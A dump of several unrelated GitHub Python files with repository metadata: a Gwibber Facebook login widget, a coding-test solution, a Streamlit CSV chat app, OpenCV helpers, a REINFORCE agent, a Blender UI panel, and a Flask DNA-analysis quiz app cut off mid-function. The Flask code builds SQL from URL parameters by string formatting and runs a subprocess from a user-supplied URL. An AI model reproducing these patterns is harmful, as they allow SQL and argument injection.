gtk.gdk.color_parse(\"red\"))\n if self.dialog:\n self.dialog.get_object('vbox_create').hide()\n except:\n self.ui.get_object(\"hbox_facebook_auth_done\").hide()\n if self.dialog:\n self.dialog.get_object(\"vbox_create\").hide()\n\n def on_facebook_auth_clicked(self, widget, data=None):\n (self.win_w, self.win_h) = self.window.get_size()\n\n web = webkit.WebView()\n web.get_settings().set_property(\"enable-plugins\", False)\n web.load_html_string(_(\"

Please wait...

\"), \"file:///\")\n\n url = urllib.urlencode({\n \"api_key\": FB_APP_KEY,\n \"connect_display\": \"popup\",\n \"v\": \"1.0\",\n \"next\": \"http://www.facebook.com/connect/login_success.html\",\n \"cancel_url\": \"http://www.facebook.com/connect/login_failure.html\",\n \"fbconnect\": \"true\",\n \"return_session\": \"true\",\n \"req_perms\": \"publish_stream,read_stream,status_update,offline_access,user_photos,friends_photos\",\n })\n web.set_size_request(450, 340)\n web.open(\"http://www.facebook.com/login.php?\" + url)\n web.connect(\"title-changed\", self.on_facebook_auth_title_change)\n\n scroll = gtk.ScrolledWindow()\n scroll.add(web)\n\n self.pack_start(scroll, True, True, 0)\n self.show_all()\n self.ui.get_object(\"vbox1\").hide()\n self.ui.get_object(\"expander1\").hide()\n\n def on_facebook_auth_title_change(self, web=None, title=None, data=None):\n if title.get_title() == \"Success\":\n try:\n url = web.get_main_frame().get_uri()\n data = json.loads(urlparse.parse_qs(url.split(\"?\", 1)[1])[\"session\"][0])\n self.account[\"session_key\"] = str(data[\"session_key\"])\n\n fbuid = self.account[\"session_key\"].split(\"-\")[1]\n fbc = facelib.Facebook(FB_APP_KEY, \"\")\n fbc.session_key = self.account[\"session_key\"]\n fbc.secret_key = str(data[\"secret\"])\n self.account[\"username\"] = str(fbc.users.getInfo(fbuid)[0][\"name\"])\n self.account[\"secret_key\"] = str(data[\"secret\"])\n \n if not self.account.has_key(\"username\"):\n self.account[\"username\"] = str(fbc.users.getInfo(fbuid)[0][\"uid\"])\n\n \"\"\"\n if \"_id\" not in self.account:\n valid = string.ascii_letters + string.digits + \"-\"\n aId = \"facebook-%s\" % self.account[\"username\"]\n self.account[\"_id\"] = \"\".join((x for x in aId if x in valid)).lower()\n \n self.account[\"secret_key\"] = \":KEYRING:%s\" % \\\n gnomekeyring.item_create_sync(\n gnomekeyring.get_default_keyring_sync(),\n gnomekeyring.ITEM_GENERIC_SECRET,\n \"Gwibber pref: %s/%s\" % (self.account[\"_id\"], \"secret_key\"),\n {\"id\": str(\"%s/%s\" % (self.account[\"_id\"], \"secret_key\"))},\n str(data[\"secret\"]), True)\n \"\"\"\n\n self.ui.get_object(\"hbox_facebook_auth\").hide()\n self.ui.get_object(\"fb_auth_done_label\").set_label(_(\"%s has been authorized by Facebook\") % str(self.account[\"username\"]))\n self.ui.get_object(\"hbox_facebook_auth_done\").show()\n if self.dialog and self.account.has_key(\"id\"):\n self.dialog.get_object(\"vbox_save\").show()\n elif self.dialog:\n self.dialog.get_object(\"vbox_create\").show()\n except:\n #FIXME: We should do this in the same window\n pass\n web.hide()\n self.window.resize(self.win_w, self.win_h)\n self.ui.get_object(\"vbox1\").show()\n self.ui.get_object(\"expander1\").show()\n\n if title.get_title() == \"Failure\":\n gtk.gdk.threads_enter()\n d = gtk.MessageDialog(None, gtk.DIALOG_MODAL, gtk.MESSAGE_ERROR,\n gtk.BUTTONS_OK, _(\"Facebook authorization failed. Please try again.\"))\n if d.run(): d.destroy()\n gtk.gdk.threads_leave()\n\n web.hide()\n self.window.resize(self.win_w, self.win_h)\n","repo_name":"SMIDEC/gwibber-lc","sub_path":"gwibber-2.32.2/gwibber/lib/gtk/facebook.py","file_name":"facebook.py","file_ext":"py","file_size_in_byte":6055,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"1688465785","text":"def solution(clothes):\n\n from collections import Counter\n\n dict_cloth = Counter([kind for _, kind in clothes])\n print(dict_cloth.values())\n from functools import reduce\n\n answer = reduce(lambda pre, now: pre * (now + 1), dict_cloth.values(), 1) - 1\n\n return answer\n\n\ndef solution_2(clothes):\n\n from collections import defaultdict\n\n dict_cloth = defaultdict(int)\n for _, kind in clothes:\n dict_cloth[kind] += 1\n\n answer = 1\n for kind in dict_cloth:\n answer *= dict_cloth[kind] + 1\n # 하루에 최소 한 개의 의상은 입어야 하므로, 아무것도 입지 않는 경우를 제외\n answer -= 1\n\n return answer\n\n\ndef solution_1(clothes):\n answer = 0\n\n dict_hash = {}\n for cloth, kind in clothes:\n dict_hash[kind] = dict_hash.get(kind, 0) + 1\n\n answer += 1\n for type in dict_hash:\n answer *= dict_hash[type] + 1\n answer -= 1\n\n return answer\n\n\nif __name__ == '__main__':\n in_c = [[\"crowmask\", \"face\"], [\"bluesunglasses\", \"face\"], [\"smoky_makeup\", \"face\"]]\n\n print(solution(in_c))\n","repo_name":"junho-devv/algorithm-study","sub_path":"PROGRAMMERSㅣ프로그래머스/고득점 KIT/해시/위장.py","file_name":"위장.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"31191915206","text":"import streamlit as st\nfrom pandasai.llm.openai import OpenAI\nfrom dotenv import load_dotenv\nimport os\nimport pandas as pd\nfrom pandasai import PandasAI\n\nload_dotenv()\n\nopenai_api_key = os.getenv(\"OPENAI_API_KEY\")\nos.environ[\"OPENAI_API_KEY\"] = \"\"\n\ndef chat_with_csv(df,prompt):\n llm = OpenAI(api_token=openai_api_key)\n pandas_ai = PandasAI(llm)\n result = pandas_ai.run(df,prompt=prompt,show_code=True,is_conversational_answer=True)\n return result\n\nst.set_page_config(layout='wide')\nst.title(\"Multiple-CSV ChatApp powered by LLM\")\n\n# Upload multiple CSV files\ninput_csvs = st.file_uploader(\"Upload your CSV files\", type=['csv'], accept_multiple_files=True)\n\nif input_csvs:\n # Select a CSV file from the uploaded files using a dropdown menu\n selected_file = st.selectbox(\"Select a CSV file\", [file.name for file in input_csvs])\n selected_index = [file.name for file in input_csvs].index(selected_file)\n\n #load and display the selected csv file \n st.info(\"CSV uploaded successfully\")\n data = pd.read_csv(input_csvs[selected_index])\n st.dataframe(data,use_container_width=True)\n\n #Enter the query for analysis\n st.info(\"Chat Below\")\n input_text = st.text_area(\"Enter the query\")\n\n #Perform analysis\n if input_text:\n if st.button(\"Chat with csv\"):\n st.info(\"Your Query: \"+ input_text)\n result = chat_with_csv(data,input_text)\n st.success(result)\n\n\n\n\n \n","repo_name":"InsightEdge01/MutiChatCSVPandasAI","sub_path":"appp.py","file_name":"appp.py","file_ext":"py","file_size_in_byte":1440,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"52"} +{"seq_id":"36275993691","text":"import cv2\nimport sys\nimport numpy as np\n\n# File utils\n\nclass ReadImage:\n def __init__(self, mode=0, rgb=True):\n '''\n Read img\n mode: int. 0 - COLOR, 1 - GRAYSCALE, 2 - WITH ALPHA CHANNEL\n rgb: bool. Invert RB channels\n '''\n self.mode = mode\n self.rgb = rgb\n\n def __call__(self, img_path):\n '''\n Read img\n img_path: string. Path to the file\n '''\n m = cv2.IMREAD_COLOR\n if self.mode == 1:\n m = cv2.IMREAD_GRAYSCALE\n elif self.mode == 2:\n m = cv2.IMREAD_UNCHANGED\n\n img = cv2.imread(img_path, m)\n\n if self.rgb:\n img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)\n\n return img\n\nclass OpenCVStream:\n\n def __init__(self, source=0):\n # Open a video file or an image file or a camera stream\n self.cap = cv2.VideoCapture(source)\n \n def get_color_frame(self):\n hasFrame, frame = self.cap.read()\n if not hasFrame:\n raise RuntimeError('No frames available.')\n \n return frame\n \n def stop(self):\n self.cap.close()","repo_name":"robertanto/Open-Set-One-Shot-Face-Recognition","sub_path":"face_recognition/video.py","file_name":"video.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"7838064018","text":"# import template\nimport tensorflow as tf\nimport numpy as np\n\nclass Agent:\n def __init__(self, state_size, num_action, reward_discount, learning_rate, exploration_strategy):\n self.state_size = state_size\n self.num_action = num_action\n self.reward_discount = reward_discount\n self.exploration_strategy = exploration_strategy\n self.iter = 0\n self.data_type = tf.float32\n self.optimizer = tf.keras.optimizers.Adam(learning_rate = learning_rate)\n self.avg_loss = tf.keras.metrics.Mean(name = 'loss')\n self.model = self.build_model('model')\n self.is_shutdown_explore = False\n\n self.buffer = []\n self.reset_buffer()\n\n def build_model(self, name):\n nn_input = tf.keras.Input(shape = self.state_size, dtype = self.data_type)\n\n x = tf.keras.layers.Dense(units = 128)(nn_input)\n x = tf.keras.layers.ReLU()(x)\n x = tf.keras.layers.Dense(units = 128)(x)\n x = tf.keras.layers.ReLU()(x)\n x = tf.keras.layers.Dense(units = self.num_action)(x)\n nn_output = tf.keras.activations.softmax(x)\n\n model = tf.keras.Model(name = name, inputs = nn_input, outputs = nn_output)\n\n return model\n\n def predict(self, state):\n return self.model(tf.convert_to_tensor(state, self.data_type))\n\n def loss(self, states, actions, rewards, state_primes):\n # Calculate accumulated reward with discount\n np_rewards = np.array(rewards)\n num_reward = np_rewards.shape[0]\n discounts = np.logspace(1, num_reward, base = self.reward_discount, num = num_reward)\n gt = np.zeros(num_reward)\n for i in range(num_reward):\n gt[i] = np.sum(np.multiply(np_rewards[i:], discounts[:num_reward - i]))\n \n # Normalize the rewards\n gt = (gt - tf.math.reduce_mean(gt)) / (tf.math.reduce_std(gt) + 1e-9)\n\n predicts = self.predict(states)\n \n # indice = tf.stack([tf.range(len(actions)), actions], axis = 1)\n # predict_probs = tf.gather_nd(predicts, indice)\n # predict_log_probs = tf.math.log(predict_probs)\n\n # log_prob = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=predicts, labels=actions)\n log_prob = tf.reduce_sum(tf.math.log(predicts) * tf.one_hot(actions, self.num_action), axis = 1)\n\n # Compute loss as formular: loss = Sum of a trajectory(-gamma * log(Pr(s, a| Theta)) * Gt)\n # Update model with a trajectory Every time.\n return tf.reduce_sum(-log_prob * gt)\n\n def get_metrics_loss(self):\n return self.avg_loss.result()\n \n def reset_metrics_loss(self):\n self.avg_loss.reset_states()\n\n def select_action(self, state):\n # Assume using Epsilon Greedy Strategy\n action = self.exploration_strategy.select_action()\n # If the index of action (return value) is -1, choose the action with highest probability that model predict\n if action == -1 or self.shutdown_explore == True:\n # Predict the probability of each action(Stochastic Policy)\n predict = self.predict([state])\n # Pick then action with HIGHTEST probability\n return tf.argmax(predict, axis = 1)[0]\n else:\n # If the index of action (return value) is != -1, act randomly \n return action\n\n def shutdown_explore(self):\n self.is_shutdown_explore = True\n \n def update(self):\n with tf.GradientTape() as tape:\n sample_states, sample_actions, sample_rewards, sample_state_primes = self.sample()\n loss = self.loss(sample_states, sample_actions, sample_rewards, sample_state_primes)\n # print(\"Loss: {}\".format(loss))\n # Update gradient\n gradients = tape.gradient(loss, self.model.trainable_variables)\n self.optimizer.apply_gradients(zip(gradients, self.model.trainable_variables))\n self.avg_loss.update_state(loss)\n\n # Update exploration rate of Epsilon Greedy Strategy\n self.exploration_strategy.update_epsilon()\n\n self.iter += 1\n\n return loss\n\n def reset_buffer(self):\n # Init & Reset buffer\n # The buffer is used for Historical Replay / Trajectory Storing etc...\n self.buffer = {'state': [], 'action': [], 'reward': [], 'state_prime': []}\n\n def add_buffer(self, new_state, new_action, new_reward, new_state_prime):\n self.buffer['state'].append(new_state)\n self.buffer['action'].append(new_action)\n self.buffer['reward'].append(new_reward)\n self.buffer['state_prime'].append(new_state_prime)\n \n def sample(self):\n # Return whole trajectory\n return self.buffer['state'], self.buffer['action'], self.buffer['reward'], self.buffer['state_prime']","repo_name":"FrankCCCCC/rl_collection","sub_path":"models/REINFORCE.py","file_name":"REINFORCE.py","file_ext":"py","file_size_in_byte":4771,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"20478882427","text":"import bpy\n\n# RobotDesigner imports\nfrom .model import check_armature\nfrom ..core import PluginManager\nfrom ..core.gui import InfoBox\nfrom ..properties.globals import global_properties\n\ndef draw(layout, context):\n \"\"\"\n Draws the user interface for file operations (i.e., import/export)\n\n :param layout: Current GUI element (e.g., collapsible box, row, etc.)\n :param context: Blender context\n \"\"\"\n layout = layout.box()\n layout.label('Import/Export')\n\n # # Will be added again once GIT persistence has been decided on\n #\n # global_properties.storage_mode.prop(context.scene,layout, expand=True)\n # storage_mode = global_properties.storage_mode.get(context.scene)\n #\n # if storage_mode == 'local':\n # pass\n # elif storage_mode == 'git':\n # global_properties.git_repository.prop(context.scene, layout)\n # global_properties.git_url.prop(context.scene, layout)\n # elif storage_mode == 'temporary':\n # global_properties.git_url.prop(context.scene, layout)\n\n row = layout.row()\n column = row.column()\n\n for plugin in PluginManager.getFilePlugins(PluginManager.PluginTypes.FILE):\n label, operators, draw_function, _ = plugin\n\n box = column.box()\n row2 =box.row(align=True)\n infoBox = InfoBox(row2)\n column2 = row2.column(align=True)\n column2.label(text=label)\n column2 = row2.column(align=True)\n if not draw_function:\n for operator in operators:\n operator.place_button(layout=column2, infoBox=infoBox)\n row2=box.row(align=True)\n infoBox.draw_info()\n\n","repo_name":"higain/BlenderRobotDesigner","sub_path":"robot_designer_plugin/interface/files.py","file_name":"files.py","file_ext":"py","file_size_in_byte":1620,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"32901149274","text":"import collections\nimport json\nimport os\nimport uuid\nimport shutil\nimport subprocess\nimport re\nfrom flask import Blueprint, flash, redirect, request, url_for, render_template\nfrom flask import Markup\nfrom models.all_models import *\nfrom werkzeug.security import generate_password_hash, check_password_hash\nfrom flask_login import login_user, login_required, logout_user, current_user\n\nbp = Blueprint('dnapi', __name__, url_prefix='/')\n\nWORKFLOW_URL = \" https://usegalaxy.eu/training-material/topics/assembly/tutorials/general-introduction/workflows/assembly-general-introduction.ga\"\n\n@bp.route('/login', methods=['GET', 'POST'])\ndef login():\n \"\"\"\n Function to log in the user\n @return: index page if login is successfully else return to login page with message\n @rtype: flask template\n \"\"\"\n if request.method == 'POST':\n username = request.form.get('username')\n password = request.form.get('password')\n user = Users.query.filter_by(username=username).first()\n if user and check_password_hash(user.password, password):\n login_user(user, remember=True)\n return redirect(url_for('index'))\n else:\n flash('Wrong username or password', category='warning')\n return render_template(\"login.html\")\n\n\n@bp.route('/register', methods=['GET', 'POST'])\ndef register():\n \"\"\"\n Function to register the user\n @return: return to the register page with success or error message\n @rtype: flask template\n \"\"\"\n if request.method == 'POST':\n username = request.form.get('username')\n password = request.form.get('password')\n repeat_password = request.form.get('repeat_password')\n user = Users.query.filter_by(username=username).first()\n if user:\n flash('username already exists', category='warning')\n elif len(username) < 3 or len(username) > 20:\n flash('username must be of length 3-20 characters', category='warning')\n elif len(password) < 3 or len(password) > 20:\n flash('password must be of length 3-20 characters', category='warning')\n elif password != repeat_password:\n flash('Passwords are not identical', category='warning')\n else:\n new_user = Users(username=username, password=generate_password_hash(password, method='sha256'))\n db.session.add(new_user)\n db.session.commit()\n flash('Account created', category='success')\n return redirect(url_for('dnapi.login'))\n # if request.method == 'GET':\n return render_template(\"register.html\")\n\n\n@bp.route('/logout')\n@login_required\ndef logout():\n \"\"\"\n Log out the user\n @return: return to the login page\n @rtype: flask template redirect\n \"\"\"\n logout_user()\n flash('Logged out successfully', category='success')\n return redirect(url_for('dnapi.login'))\n\n\n@bp.route('/level//intro')\ndef intro(level_id):\n \"\"\"\n Function for accessing each level's introduction page\n @param level_id: id of level\n @type level_id: integer in string form\n @return: return the certain introduction page\n @rtype: flask template\n \"\"\"\n return render_template(\"games/level%s/intro.html\" % level_id, cur_lvl_intro=int(level_id))\n\n\n@bp.route('/level//chapter/')\ndef chapter(level_id, chapter_id):\n \"\"\"\n view function for quiz page\n @param level_id: the level id for showing related quiz questions\n @type level_id: integer\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @return: flask template for quiz\n @rtype: flask template\n \"\"\"\n if level_id == \"3\" and chapter_id == \"4\":\n if current_user.is_authenticated:\n return redirect(url_for('dnapi.paper_writing', ifFinished=False))\n else:\n return redirect(url_for('dnapi.login'))\n\n cur_chapter = Chapter.query.filter_by(level_id=int(level_id), order_id=int(chapter_id)).first()\n chapter_dump, questions_dump = quiz_questions_helper(cur_chapter.id)\n\n return render_template(\"games/chapter.html\", questions=questions_dump, chapter=chapter_dump)\n\n\ndef delete_previous_result(chapter_id):\n \"\"\"\n function deleting previous results with given chapter_id and logged_in user\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n if current_user.is_authenticated:\n db.engine.execute(\n \"delete from answer where answer.choice_id in ( select answer.choice_id from answer, choice, chapter, users, question where answer.choice_id = choice.id and choice.question_id = question.id and question.chapter_id = chapter.id and chapter.id = %s and users.id = %s )\" % (\n chapter_id, current_user.id))\n db.engine.execute(\n \"delete from open_answer where open_answer.id in ( select open_answer.id from open_answer, question where open_answer.question_id = question.id and question.chapter_id = %s and open_answer.user_id = %s )\" % (\n chapter_id, current_user.id))\n db.engine.execute(\"delete from score where chapter_id = %s and user_id=%s\" % (chapter_id, current_user.id))\n\n\ndef store_quiz_results(chapter_id, form):\n \"\"\"\n function for storing quiz results\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @param form: user submitted form\n @type form: dict\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n chapter_dump, questions_dump = quiz_questions_helper(chapter_id)\n cur_score = 0\n\n # delete old results if the user is authenticated\n delete_previous_result(chapter_id)\n\n # check score for each question\n i = 0\n while i < len(questions_dump):\n j = i\n if questions_dump[i]['type'] in ['choose_one', 'grid', 'choose_many', 'grid_checkbox']:\n submitted_answers = set(form.getlist(questions_dump[i]['id']))\n # if the user is_authenticated, update answer to the database for each choice selected\n if current_user.is_authenticated:\n for aws_id in submitted_answers:\n new_answer = Answer(\n user_id=current_user.id,\n choice_id=aws_id\n )\n db.session.add(new_answer)\n db.session.commit()\n elif questions_dump[i]['type'] in ['open']:\n submitted_answer = form[questions_dump[i]['id']]\n # if the user is_authenticated, update answer to the database for each choice selected\n if not submitted_answer:\n questions_dump[i]['missed'] = True\n else:\n questions_dump[i]['score'] = questions_dump[i]['point']\n questions_dump[i]['ans'] = submitted_answer\n cur_score += questions_dump[i]['point']\n if current_user.is_authenticated:\n new_answer = OpenAnswer(\n user_id=current_user.id,\n answer=submitted_answer,\n question_id=questions_dump[i]['id'],\n )\n db.session.add(new_answer)\n db.session.commit()\n # start counting selected correct choices and wrong choices that user didn't select\n selected_correct = 0\n missed_wrong = 0\n if questions_dump[i]['type'] in ['choose_one', 'grid']:\n if not form.get(questions_dump[i]['id']):\n questions_dump[i]['missed'] = True\n for choice in questions_dump[i]['choices']:\n if choice['correctness']:\n if choice['id'] in submitted_answers:\n choice['state'] = 'correct'\n selected_correct += 1\n else:\n choice['state'] = 'missed'\n else:\n if choice['id'] in submitted_answers:\n choice['state'] = 'wrong'\n else:\n missed_wrong += 1\n if selected_correct > 0:\n questions_dump[i]['score'] = questions_dump[i]['point']\n cur_score += questions_dump[i]['point']\n else:\n questions_dump[i]['score'] = 0\n elif questions_dump[i]['type'] in ['choose_many', 'grid_checkbox']:\n total_choice_num = 0\n while j < len(questions_dump):\n if questions_dump[j]['title'] != questions_dump[i]['title']:\n break\n if not form.get(questions_dump[j]['id']):\n questions_dump[j]['missed'] = True\n for choice in questions_dump[j]['choices']:\n total_choice_num += 1\n if choice['correctness']:\n if choice['id'] in submitted_answers:\n choice['state'] = 'correct'\n selected_correct += 1\n else:\n choice['state'] = 'missed'\n else:\n if choice['id'] in submitted_answers:\n choice['state'] = 'wrong'\n else:\n missed_wrong += 1\n j += 1\n correct_sum = selected_correct + missed_wrong\n question_score = 0\n if correct_sum == 0:\n question_score = 0\n else:\n question_score = round(correct_sum / total_choice_num * questions_dump[i]['point'])\n cur_score += question_score\n for k in range(i, j):\n questions_dump[k]['score'] = question_score\n i = j - 1\n else:\n pass\n i += 1\n\n # if the user is authenticated, update final score to the database\n if current_user.is_authenticated:\n new_score = Score(\n score=cur_score,\n user_id=current_user.id,\n chapter_id=chapter_id\n )\n db.session.add(new_score)\n db.session.commit()\n\n ranking = get_ranking(chapter_id)\n return questions_dump, chapter_dump, cur_score, ranking\n\n\n@bp.route('/quiz//submit', methods=['POST'])\ndef quiz_submit(chapter_id):\n \"\"\"\n function for receiving quiz answers, checking them, store the score and return to the result page\n @param chapter_id: the chapter id for showing related quiz questions\n @type chapter_id: integer\n @return: return the quiz result page\n @rtype: flask template\n \"\"\"\n\n questions_dump, chapter_dump, cur_score, ranking = store_quiz_results(chapter_id, request.form)\n\n return render_template(\"games/quiz_result.html\", questions=questions_dump, cur_lvl=chapter_dump['level_id'],\n chapter=chapter_dump, score=cur_score, ranking=ranking)\n\n\ndef left_chapter_menu_helper():\n \"\"\"\n helper function to return a lvl->chapter dictionary for the chapter menu\n @return: a lvl->chapter dictionary\n @rtype: dictionary\n \"\"\"\n levels = Level.query.all()\n levels = levels_schema.dump(levels)\n level_dict = {}\n for lvl in levels:\n if lvl['chapters']:\n level_dict[lvl['id']] = []\n for ch in lvl['chapters']:\n chapter = Chapter.query.get(ch)\n chapter = chapter_schema.dump(chapter)\n level_dict[lvl['id']].append(chapter)\n\n if current_user.is_authenticated:\n done_chapters = db.engine.execute('select chapter_id from score where user_id = %s' % (current_user.id))\n done_chapters_list = [row[0] for row in done_chapters]\n if done_chapters_list:\n for chapters in level_dict.values():\n for ch in chapters:\n if ch['id'] in done_chapters_list:\n ch['done'] = 1\n return level_dict\n\n\ndef quiz_questions_helper(chapter_id):\n \"\"\"\n function to get a chapter object and a list of questions of the particular chapter by chapter id\n @param chapter_id: id of the chapter\n @type chapter_id: integer\n @return: a chapter object and a list of questions of the particular chapter\n @rtype: chapter object and list\n \"\"\"\n questions = Question.query.filter_by(chapter_id=chapter_id).order_by(Question.id).all()\n questions_dump = questionswithanswers_schema.dump(questions)\n cur_chapter = Chapter.query.get(chapter_id)\n chapter_dump = chapter_schema.dump(cur_chapter)\n return chapter_dump, questions_dump\n\n\ndef handle_addtime(result_raw):\n \"\"\"\n make raw sql result to list of dictionaries and remove microseconds from addtime field\n @param result_raw: raw sql result\n @type result_raw: raw sql result\n @return: sql result in the form of a list of dictionary\n @rtype: a list of dictionary\n \"\"\"\n result = [dict(row) for row in result_raw]\n for c in result:\n if c['add_time']:\n c['add_time'] = c['add_time'].replace(microsecond=0)\n return result\n\n\n@bp.route('/progress')\n@login_required\ndef progress():\n \"\"\"\n view function for progress page\n @return: return the progress page\n @rtype: flask template\n \"\"\"\n # get raw query result\n chapters_raw = db.engine.execute(\n 'select chapter.id, order_id, name, score, add_time, level_id from chapter left join score on score.chapter_id = chapter.id and score.user_id = %s order by chapter.id' % (current_user.id))\n\n # process time format and make the result a dictionary\n chapters_processed = handle_addtime(chapters_raw)\n\n # convert it into a lvl_id:[chapters] dictionary\n chapter_lvl_dict = {}\n for c in chapters_processed:\n if c['level_id'] not in chapter_lvl_dict:\n chapter_lvl_dict[c['level_id']] = []\n chapter_lvl_dict[c['level_id']].append(c)\n\n # sort it by the lvl id\n sorted_dict = collections.OrderedDict(sorted(chapter_lvl_dict.items()))\n\n return render_template(\"progress.html\", lvl_dict=sorted_dict)\n\n\ndef get_ranking(chapter_id):\n \"\"\"\n function to return top 5 result for certain chapter\n @param chapter_id: id of the chapter\n @type chapter_id: integer\n @return: a list of ranking\n @rtype: list\n \"\"\"\n ranking_raw = db.engine.execute(\n 'select username, score, add_time, user_id from score, users where score.user_id = users.id and score.chapter_id = %s order by score DESC, add_time ASC limit 5' % (\n chapter_id))\n ranking = handle_addtime(ranking_raw)\n return ranking\n\n\n@bp.route('/level//chapter//result')\n@login_required\ndef chapter_result(level_id, chapter_id):\n \"\"\"\n function for receiving quiz answers\n @param level_id: the level id of the chapter\n @type level_id: integer\n @param chapter_id: the chapter id for showing related quiz result\n @type chapter_id: integer\n @return: return result page\n @rtype: flask template\n \"\"\"\n if level_id == \"3\" and chapter_id == \"4\":\n return redirect(url_for('dnapi.paper_writing', ifFinished=True))\n cur_chapter_raw = db.engine.execute(\n 'select * from chapter where level_id = %s and order_id = %s' % (level_id, chapter_id))\n cur_chapter = [dict(row) for row in cur_chapter_raw]\n chapter_dump, questions_dump = quiz_questions_helper(cur_chapter[0]['id'])\n selected_choices_raw = db.engine.execute(\n \"select question.id as q_id, choice.id as c_id from answer, chapter, choice, question where choice.question_id = question.id and question.chapter_id = chapter.id and choice.id = answer.choice_id and user_id = %s and chapter.id = %s order by question.id, choice.id\" % (\n current_user.id, cur_chapter[0]['id']))\n ranking = get_ranking(cur_chapter[0]['id'])\n\n\n if level_id == \"2\" and chapter_id == \"3\" and current_user.is_authenticated:\n history_link = GalaxyHistoryLinks.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter[0]['id']).first()\n return render_template(\"games/chapter.html\", questions=questions_dump, chapter=chapter_dump, history_link=history_link)\n\n open_anwser_raw = db.engine.execute(\n 'select question.id as q_id, answer as ans from open_answer, question, chapter where question.chapter_id = chapter.id and question.id = open_answer.question_id and user_id = %s and chapter.id = %s' % (current_user.id, cur_chapter[0]['id']))\n open_anwers = [dict(row) for row in open_anwser_raw]\n\n\n selected_choices = {}\n for row in selected_choices_raw:\n if str(row[0]) not in selected_choices:\n selected_choices[str(row[0])] = []\n selected_choices[str(row[0])].append(str(row[1]))\n\n score = Score.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter[0]['id']).first()\n\n for question in questions_dump:\n if question['type'] in ['choose_one', 'grid', 'choose_many', 'grid_checkbox']:\n if question['id'] not in selected_choices:\n question['missed'] = True\n for choice in question['choices']:\n if choice['correctness']:\n if question['id'] in selected_choices and choice['id'] in selected_choices[question['id']]:\n choice['state'] = 'correct'\n else:\n choice['state'] = 'missed'\n else:\n if question['id'] in selected_choices and choice['id'] in selected_choices[question['id']]:\n choice['state'] = 'wrong'\n elif question['type'] in ['open']:\n for oa in open_anwers:\n if str(oa['q_id']) == str(question['id']):\n question['ans'] = oa['ans']\n\n return render_template(\"games/quiz_result.html\", questions=questions_dump, cur_lvl=level_id,\n chapter=chapter_dump, score=score.score, ranking=ranking)\n\n\n@bp.route('/galaxy_history', methods=['POST'])\ndef galaxy_history():\n \"\"\"\n view function for galaxy history result\n @return: return galaxy history result page\n @rtype: flask template\n \"\"\"\n\n # Check if the Galaxy API KEY is set correctly\n if 'GALAXY_API_KEY' in os.environ:\n api_key = os.environ['GALAXY_API_KEY']\n else:\n flash(Markup(\n 'The Galaxy API KEY is not set correctly. Please contact the developer'), category='warning')\n return redirect(request.referrer)\n history_url = request.form.get('history_url')\n TMP_DIR = '/tmp/dnapi'\n folder_name = str(uuid.uuid4())\n output_path = os.path.join(TMP_DIR, folder_name)\n output_report_path = os.path.join(output_path, 'report.json')\n\n # check if the submitted galaxy history url is valid\n pattern = r'^https://usegalaxy\\.eu/u/.+/h/.+$'\n if not re.match(pattern, history_url):\n flash(Markup('Invalid Galaxy history url, It should follow the pattern: https://usegalaxy.eu/u/.../h/...
Learn how to share history HERE .'), category='warning')\n return redirect(request.referrer)\n\n # execute the ghevaluator command\n command = f\"ghevaluator -u {history_url} -w {WORKFLOW_URL} -a {api_key} -o {output_path}\"\n print(f\"Executing command: {command}\")\n process = subprocess.Popen(command.split(), stdout=subprocess.PIPE)\n output, error = process.communicate()\n print(output)\n print(error)\n\n # read the output report json file\n with open(output_report_path) as test_file:\n json_result = json.load(test_file)\n chapter = Chapter.query.get(8)\n\n # calculate score based on tools used\n num_of_tools = 0 # total number of tools\n score = 0 # user score\n for tool, tool_res in json_result['comparison_by_reference_workflow_tools'].items():\n for step_num, step_res in tool_res['details'].items():\n num_of_tools += 1\n # check if using the same tool\n if step_res['id'] and step_res['id']['same']:\n score += 5\n # if using the same tool, then check tool version\n if step_res['version'] and step_res['version']['same']:\n score += 1\n # if using the same tool, then check parameters\n if step_res['parameters'] and step_res['parameters']['wrong'] and step_res['parameters']['number'] and \\\n step_res['parameters']['number']['workflow']:\n percentage_of_correct_params = (step_res['parameters']['number']['workflow'] - step_res['parameters']['wrong']) / step_res['parameters']['number']['workflow']\n score += (max(percentage_of_correct_params, 0)) * 2\n normalized_score = round(score / (num_of_tools * 8) * 100, 2)\n\n # remove move the tmp folder\n shutil.rmtree(output_path)\n\n # if the user is authenticated, update final score to the database\n if current_user.is_authenticated:\n\n cur_chapter = Chapter.query.filter_by(level_id=2, order_id=3).first()\n old_score = Score.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter.id).first()\n old_history_link = GalaxyHistoryLinks.query.filter_by(user_id=current_user.id, chapter_id=cur_chapter.id).first()\n\n if not old_history_link or old_history_link.url != history_url:\n new_history = GalaxyHistoryLinks(\n user_id=current_user.id,\n chapter_id=cur_chapter.id,\n url=history_url\n )\n db.session.add(new_history)\n db.session.commit()\n\n if not old_score or old_score.score != normalized_score:\n new_score = Score(\n score=normalized_score,\n user_id=current_user.id,\n chapter_id=cur_chapter.id\n )\n db.session.add(new_score)\n db.session.commit()\n\n return render_template(\"games/level2/galaxy_result.html\", result=json_result, chapter=chapter,\n score=normalized_score)\n\n\n@bp.context_processor\ndef provide_menu():\n \"\"\"\n function to provide global variable for all the templates to use\n @return: a dictionary for level->[chapters]\n @rtype: dictionary\n \"\"\"\n level_dict = left_chapter_menu_helper()\n return {'level_dict': level_dict}\n\n\ndef open_question_handler(form_data, chapter_id):\n 